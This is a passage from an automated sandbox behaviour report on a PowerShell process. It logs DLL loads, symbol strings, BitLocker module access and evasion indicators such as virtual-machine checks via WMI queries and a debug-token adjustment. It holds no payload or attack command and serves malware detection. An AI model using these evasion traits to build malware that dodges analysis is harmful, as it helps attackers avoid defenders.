Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: lib.pdbI source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb] source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.55123452403.000001A8EFBC7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32rogram Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BRfaul/ source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F02F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.55125120725.000001A8EFE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.55123452403.000001A8EFB6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?t.Automation.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdbpdblib.pdb source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb@ source: powershell.exe, 00000000.00000002.55126661352.000001A8EFEDC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFEA26FD2A5 pushad ; iretd 0_2_00007FFEA26FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFEA28100BD pushad ; iretd 0_2_00007FFEA28100C1

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9820Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.55127185203.000001A8F031E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineHI
Source: powershell.exe, 00000000.00000002.55116047676.000001A8E7E23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.55127185203.000001A8F0302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55127185203.000001A8F02F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D92E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55091794002.000001A8D8315000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachinex
Source: powershell.exe, 00000000.00000002.55127185203.000001A8F0302000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.55127185203.000001A8F02F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.55091794002.000001A8D92E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.55127185203.000001A8F0359000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
